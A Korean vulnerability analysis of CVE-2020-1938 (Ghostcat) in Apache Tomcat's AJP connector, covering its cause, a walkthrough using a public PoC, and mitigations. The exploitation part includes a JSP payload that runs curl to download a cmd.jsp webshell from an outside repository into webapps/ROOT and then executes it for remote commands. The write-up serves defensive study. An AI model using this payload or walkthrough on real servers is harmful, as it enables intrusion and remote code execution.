CVE-2020-1938 취약점 분석

개요

Apache Tomcat 6,7,8,9 버전에서 기본적으로 제공하던 AJP(Apache Jserv Protocol) 프로토콜의 취약점이 발견되었습니다. 이는 2020년 01월 03일 중국의 보안업체인 “차이 틴 테크”에서 발견하였으며 CVSS에서 9.8이라는 높은 점수를 받을 만큼 파급력 이 높은 취약점입니다.

 

해당 취약점이 존재할 경우 AJP 프로토콜을 통해 /webapps/ROOT 디렉토리의 하위 파일들을 읽을 수 있으며 업로드가 존재할 경우 “원격코드 실행”까지 가능해집니다.

 

취약점이 발표된 후 2020년 2월 End of Service 된된 6.x버전을 제외한 모든 버전의 패치가 이루어졌으나 현재까지 Github에 다수의 POC가 존재하기 때문에 이를 악용하는 공격 빈도가 계속 증가할 것으로 예상됩니다.

 

원리

Tomcat에서 AJP 프로토콜은 몇십 년 전부터 사용되어 왔으며 HTTP 프로토콜의 성능을 최적 화 시키기 위해 Apache 웹 서버나 다른 인스턴스와 다양한 데이터를 교환하기 위해 사용되어왔습니다. AJP는 설치 후 기본적으로 8009 포트로 활성화되고 있으며 해당 포트에 대한 모든 IP 주소(0.0.0.0)에 Listening을 하는 것이 문제가 되었습니다.

 

Tomcat이 AJP 요청을 받을 시 AjpProcessor.java를 호출하여 이를 처리하고 prepareRequest 메서드를 통해 AJP 메세지 내용을 추출하여 Request 객체의 Attribute 속성으로 설정하는데 이때 내용을 검증하는 로직이 존재하지 않기에 공격자가 지정해둔 또는 원하는 경로의 파일을 읽어올 수 있도록 제어할 수 있게 됩니다.

 

/webapps/디렉토리에는 모든 웹 애플리케이션이 저장되는 디렉토리로 기본적으로 하위에 존재하는 /WEB-INF/디렉토리는 클라이언트에게 접근이 불가능하게 설정되어 있습니다.

 

server.xml 파일에서 <Connector port=”8009” 영역이 주석처리 없이 활성화되어있는 것을 확인할 수 있습니다. 또한 해당 포트를 통해 접근 시 검증 절차를 거치는 옵션인 requiredSecret 이 존재하지 않습니다.

 

클라이언트가 접근이 불가능한 web.xml 파일을 읽기 위한코드를 확인해보면 기본적인 AJP 8009 포트로 요청을 수행하고 있습니다.

* POC 참고: https://github.com/00theway/Ghostcat-CNVD-2020-10487/blob/master/ajpShooter.py

 

해당 POC 코드를 실행시키기 위해선 python3 버전을 사용해야 된다. 그렇지 않을 경우 하단의 함수들을 이해하지 못합니다.

 

또한 기본 포트인 AJP 프로토콜을 8201처럼 다른 포트로 사용해도 포트 스캐닝을 통해 충분히 AJP 프로토콜의 포트 식별을 할 수 있습니다.

 

python3를 사용하여 대상 서버의 주소와 8009 포트 및 읽으려는/WEB-INF/web.xml을 입력 후 read를 붙여줍니다.

 

출력된 web.xml 파일입니다. 웹 상에서는 접근이 불가능하지만 해당 POC를 통해 webapps 디렉토리 하위에 존재하는 환경설정 파일을 읽을 수 있습니다.

 

사용된POC코드에서는명령을 shooter라는 변수에 받아 실행하고 있다. shooter에 read 명령을 받을 경우 index.txt 형태로 정보를 가져오도록 요청하고 있습니다.

 

AJP Request Header 정보를 확인해보면 요청 uri 정보를 index.txt 형태로 servlet_path를 변경하여 성공적으로 내부 내용을 가져오고 있습니다.

<원래 기능>
javax.servlet.include.request_uri = /mani-examples/jsp/included.jsp
javax.servlet.include.servlet_path = /jsp/included.jsp

 

테스트를 위해 업로드 페이지를 구축하지 않더라도 디렉토리에 직접 업로드하여 진행할 수 있습니다.

 

대상 서버에 활성화된 AJP 포트 확인해보도록 하겠습니다. 만약 전체적인 포트 스캐닝을 수행 후 AJP 포트가 식별되지 않는다면 -p 옵션을 사용하여 포트를 지정하여 확인하면 open 유무를 파악할 수 있습니다.

 

원격코드를 실행하기 위해 사용된 165바이트 크기의 webshell 코드다. curl에 -o 옵션을 통해 /webapps/ROOT/디렉토리에 cmd.jsp 파일을 다운로드하도록 하겠습니다.

POC 코드	<% Runtime.getRuntime().exec("cmd.exe /C curl -o ..\\webapps\\ROOT\\cmd.jsp https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp"); %>
cmd.jsp 코드를 가져올 위치	https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

해당 웹쉘 파일은 서버 사이드 스크립트 언어로 작성되었지만. txt형태로 업로드하여 POC코드 내용을 통해 변환하여 실행할 수 있습니다.

 

해당 파일을 대상 서버에 업로드시켜보도록 하겠습니다.

 

업로드가 성공적으로 된 것을 확인할 수 있습니다. 만약 대상 페이지에서 업로드 시 확장자를 검사하거나 업로드 용량을 타이트하게 제한하지 않으면 이를 우회할 가능성이 존재합니다. 첫번째로 서버 측에 전달 시. jsp형태로 전달할 필요가 없으며 용량도 많이 잡아먹지 않기 때문입니다.

 

*대상 OS가 Linux 기반이라면 "wget" 명령을 통해 다운로드시켜도 됨

 

ghostcat.txt 웹쉘에는 cmd.jsp가 /webapps/ROOT 디렉토리에 다운로드 되도록 설정되어 있습니다. 만약 성공적으로 디렉토리 경로를 파악하고 읽기에 성공한다면 위처럼 webshell 코드가 나타납니다.

 

/webapps/ROOT/ 디렉토리에 cmd.jsp 파일이 생긴 것을 확인할 수 있습니다.

 

이제 업로드된 ghostcat.txt 웹쉘을 서버 사이드 언어로 실행되도록 해야 됩니다. POC코드에서는 read 명령어와 eval 명령어를 받아 읽기/쓰기 형태로 수행되고 있습니다.

 

POC코드에서는read와명령어를 shooter 변수에 담아 수행하는 코드가 존재합니다. 

 

앞서 진행했던 web.xml을 읽기 위해선 shooter 변수에 read 명령을 받고 index.txt 형태로 읽기를 진행하고 else 즉eval로 실행할 경우 index.jsp로 요청하도록 수행하기 있습니다.

 

request_uri 나sevlet_path라는 설정 파일을 별도의 인증과정 없이 접근할 수 있기 때문에 원래의 include 정보를 우리가 업로드시킨 바뀌도록 제어할 수 있습니다.

<원래 기능>
javax.servlet.include.request_uri = /mani-examples/jsp/included.jsp
javax.servlet.include.servlet_path = /jsp/included.jsp

 

servlet_path의 경로를 업로드된 ghostcat.txt로 바꿔서 요청하고 요청 uri 정보는 index.jsp 형태로 변환시킴으로써 서버 사이드 언어 형태로 실행되도록 하고 있습니다.

 

이제 업로드시킨 경로에서 cmd.jsp 파일로 접근해보면 Command를 입력할 수 있는 폼이 확인된다. windows에서 사용되는 시스템 명령어를 입력해보면 성공적으로 실행됩니다.

 

대응 방안

(1) 최신 보안 패치

취약한 버전	보안 패치 버전	패치 일자
Apache Tomcat 6.x	End of Service
Apache Tomcat 7.0.0. ~ 7.0.99	Apache Tomcat 7.0.100	2020.02.14
Apache Tomcat 8.5.0 ~ 8.5.50	Apache Tomcat 8.5.51	2020.02.11
Apache Tomcat 9.0.0M1 ~ 9.0.30	Apache Tomcat 9.0.31	2020.02.11

보안 패치가 진행된 버전의 경우 이전에 별도의 검증 없이 파일을 실행하던 취약점은 getAllowedArbitratyRequestAttributesPattern() 을 통해 검증하는 기능이 추가되었습니다.

# Linux 환경에서 톰캣 버전 확인
(1) Tomcat 의 /bin/디렉토리에서 -> ./version.sh 수행
# cd /bin/
# ./version.sh
(2) Tomcat 의 /bin/디렉토리에서 해당 명령어 실행
# cd /bin/
# java –cp catalina.jar org.apache.catalina.util.ServerInfo 실행 후 “Server number 확인”

 

(2) AJP 프로토콜 비활성화

서비스 차원에서 최신 보안 패치를 진행하기까지 조금 오랜 시간이 필요할 수도 있으며 당장 진행하기 힘든 경우도 존재합니다. 이럴 경우 임시적으로 라도 활성화되어있는프로토콜을 비활성 비 시키는 것이 좋습니다.

server.xml 파일에서 해당 # <Connector port=”8009” protocol=”AJP”/1.3” redirectPort=”8443” /> 부분을 주석처리

 

(3) AJP 프로토콜에 인증 구현

# <Connector port=”8009” protocol=”AJP”/1.3” redirectPort=”8443” /> 주석처리
<Connector protocol=”AJP/1.3”
           address” AJP/1.3 “
           port=” 8009 “
           redirectPort=” 8443 “
           requiredSecret=” [AJP인증속성]” />

server.xml 파일에서 기존 AJP 라인은 주석 처리하고 추가적으로 인증을 구현할 수 있는 로직을 추가한 후 재시작하면 됩니다.